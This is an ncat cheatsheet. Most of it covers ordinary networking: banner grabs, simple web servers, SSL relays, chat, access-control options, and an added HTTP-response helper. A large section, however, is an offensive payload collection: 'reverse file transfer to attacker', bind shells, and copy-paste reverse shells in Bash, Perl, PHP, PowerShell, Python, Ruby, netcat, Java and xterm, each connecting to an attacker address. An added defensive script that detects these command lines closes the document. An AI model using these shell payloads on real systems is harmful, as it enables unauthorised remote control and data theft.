Name
ncat — Concatenate and redirect sockets
Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]
Banner Grab
printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
SSL Banner Grab
printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes
<!DOCTYPE html>
<html lang="en">
...
Simple Web Server
echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"
Once the ncat command is running, open a web browser and point it at http://localhost:8080. ncat serves one request and then exits.
Accept multiple requests
ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"
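The one-liners above send only a status line and a blank line, so the browser has to guess the content type and wait for the connection to close to find the end of the body. The shell function below is an added example, not part of the original cheatsheet or of ncat itself: it builds a well-formed HTTP/1.1 response (Content-Type and Content-Length included) for a given file and can be handed to ncat's -c option. The function name http_response and the file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): emit a well-formed HTTP/1.1
# response for one file on stdout, suitable for `ncat -l -c '...'`.

http_response() {
    file=$1
    if [ ! -f "$file" ]; then
        # Fixed 10-byte body "Not Found\n" so Content-Length stays correct
        printf 'HTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\nContent-Length: 10\r\nConnection: close\r\n\r\nNot Found\n'
        return 1
    fi

    # Pick a content type from the extension; anything else is treated as opaque bytes
    case $file in
        *.html|*.htm) ctype='text/html; charset=utf-8' ;;
        *.txt)        ctype='text/plain; charset=utf-8' ;;
        *.json)       ctype='application/json' ;;
        *)            ctype='application/octet-stream' ;;
    esac

    # Byte length of the body, so the client knows where the response ends
    len=$(wc -c < "$file" | tr -d ' ')

    printf 'HTTP/1.1 200 OK\r\nContent-Type: %s\r\nContent-Length: %s\r\nConnection: close\r\n\r\n' "$ctype" "$len"
    cat "$file"
}
```

Save this as http_response.sh next to stuff.html and run `ncat -l -p 8080 --keep-open -c '. ./http_response.sh; http_response stuff.html'`; ncat executes the -c string with /bin/sh, so the function's output goes straight to the client. Like the original one-liner it never reads the request, so every client gets the same file.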
A Better HTTP Server
There’s a neat Lua script that takes advantage of ncat’s ability to run Lua code via --lua-exec. The script can be found here. Try saving it to /tmp/httpd.lua
Navigate to a directory with .html files in it, and run the following command.
ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open
Unwrap SSL Connections
Server
Listen on port 6666 as a plain-text server. On each incoming connection, connect to api.ipify.org:443 over SSL and relay traffic between the client and the server. The -o option also saves the full session to out.log for later analysis.
ncat -l -p 6666 -c 'ncat --ssl api.ipify.org 443' --keep-open -o out.log
Client
Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to api.ipify.org:443 using SSL.
curl 'http://localhost:6666?format=json' -H 'Host: api.ipify.org'
Connect two incoming connections
ncat -l -p 8080 -c 'ncat -l -p 9090'
Connect two listening servers
This relays traffic between the two listeners, which can have some very interesting results.
ncat localhost 8080 -c 'ncat localhost 9090'
For more, check out our pivoting cheatsheet.
Telnet
ncat -t 192.168.1.1 23
Simple Chat
Server
ncat -l 1234 --chat
Client(s)
ncat localhost 1234
Copy Files with UDP
Server
ncat -l 6666 --udp
Client
ncat --udp localhost 6666 < stuff.py
Access Controls
Whitelist IPs
ncat -l -p 8080 --allow 192.168.1.1
Whitelist from file
Hosts should be separated by new lines
ncat -l -p 8080 --allowfile hosts
Blacklist IPs
ncat -l -p 8080 --deny 192.168.1.1,10.10.0.1
Blacklist IPs from file
Hosts should be separated by new lines
ncat -l -p 8080 --denyfile hosts
File Transfer with SSL
Reverse file transfer to attacker
Attacker
ncat -l -p 6666 --ssl > outputfile
Victim
ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat
File send w/ Sender listening
Attacker
ncat -l --ssl -p 6666 --send-only < /bin/ncat
Victim
ncat localhost 6666 --ssl > outputfile
Bind Shell
Linux
ncat -l 6666 -e /bin/sh
Windows
ncat -l 6666 -e cmd
Reverse Shell
Victim
ncat <attacker ip address> 6666 -e /bin/sh
Attacker
ncat -l -p 6666
Victim machine doesn’t have ncat?
Bash
bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
php -r '$sock=fsockopen("10.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address>"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
Python 2.7 and 3
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 6666
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.
allowed_users=anybody
To catch the incoming xterm, start an X-Server (:1 — which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest -ac :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
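Every bind and reverse shell on this page, from the ncat -e listeners down to the xterm trick, shows up in process command-line telemetry (auditd EXECVE records, Sysmon process-creation events, or a plain ps snapshot) with a handful of recognisable tokens: a /dev/tcp redirection, a netcat with -e, a scripting runtime opening a socket and exec'ing a shell, or xterm -display pointing at a remote address. The script below is an added example written from the defender's side; it is not part of the original cheatsheet. detect_shell_indicator checks one command line against indicator patterns derived from the commands above, and scan_process_list runs it over a constructed process listing. The labels, function names, regexes and sample listing are all assumptions and need tuning for a real environment.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): flag the bind/reverse-shell
# command lines shown on this page when they appear in process telemetry.

# One indicator per line: "<label> <extended regex>". Labels and regexes are
# constructed here from the cheatsheet's own commands; tune them to your environment.
SHELL_INDICATORS='bash-dev-tcp /dev/(tcp|udp)/[^/[:space:]]+/[0-9]+
netcat-exec (^|[[:space:]/])(nc|ncat|netcat)([[:space:]]+[^[:space:]]+)*[[:space:]]+-e[[:space:]]
python-socket-dup2 python.*socket.*dup2
perl-socket-exec perl.*Socket.*exec[(]
php-fsockopen-exec php.*fsockopen.*exec[(]
ruby-tcpsocket-exec ruby.*TCPSocket.*exec
powershell-client-iex (UDPClient|TCPClient).*iex
xterm-remote-display xterm.*-display[[:space:]]+[0-9.]+:[0-9]+'

# detect_shell_indicator CMDLINE
# Prints the label of the first matching indicator and returns 0; returns 1 if clean.
detect_shell_indicator() {
    cmdline=$1
    while read -r label pattern; do
        [ -z "$pattern" ] && continue
        if printf '%s\n' "$cmdline" | grep -Eq -- "$pattern"; then
            printf '%s\n' "$label"
            return 0
        fi
    done <<EOF
$SHELL_INDICATORS
EOF
    return 1
}

# scan_process_list LISTING
# LISTING has one process per line: "<pid> <user> <command line>".
# Writes one ALERT line per hit to stderr and prints the number of hits on stdout.
scan_process_list() {
    hits=0
    while read -r pid user cmdline; do
        [ -z "$cmdline" ] && continue
        if label=$(detect_shell_indicator "$cmdline"); then
            printf 'ALERT pid=%s user=%s indicator=%s cmd=%s\n' "$pid" "$user" "$label" "$cmdline" >&2
            hits=$((hits + 1))
        fi
    done <<EOF
$1
EOF
    printf '%s\n' "$hits"
}

# Constructed sample listing (not real telemetry): two benign processes, including a
# legitimate ncat listener with --allow, among shells taken from this page. Expected: 6 hits.
SAMPLE_PROCESS_LIST='1201 www-data /usr/sbin/nginx -g daemon off;
1342 alice bash -i >& /dev/tcp/10.0.0.1/6666 0>&1
1377 alice ncat -l 6666 -e /bin/sh
1390 bob nc -e /bin/sh 10.0.0.1 6666
1401 bob python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0)
1410 bob xterm -display 10.0.0.1:1
1422 root ncat -l -p 8080 --allow 192.168.1.1
1435 carol ruby -rsocket -e f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Running the script directly prints the alerts to stderr and the hit count to stdout.
scan_process_list "$SAMPLE_PROCESS_LIST"
```

The netcat-exec pattern deliberately requires a standalone -e token after an nc, ncat or netcat command, so an ordinary ncat listener using --allow, --ssl or --keep-open is not flagged; the xterm pattern only fires on a numeric display address, since xterm -display localhost:1 is normal desktop use. Command-line matching is cheap and easy to bypass, so treat a hit as a trigger for looking at the process's network connections rather than as proof on its own.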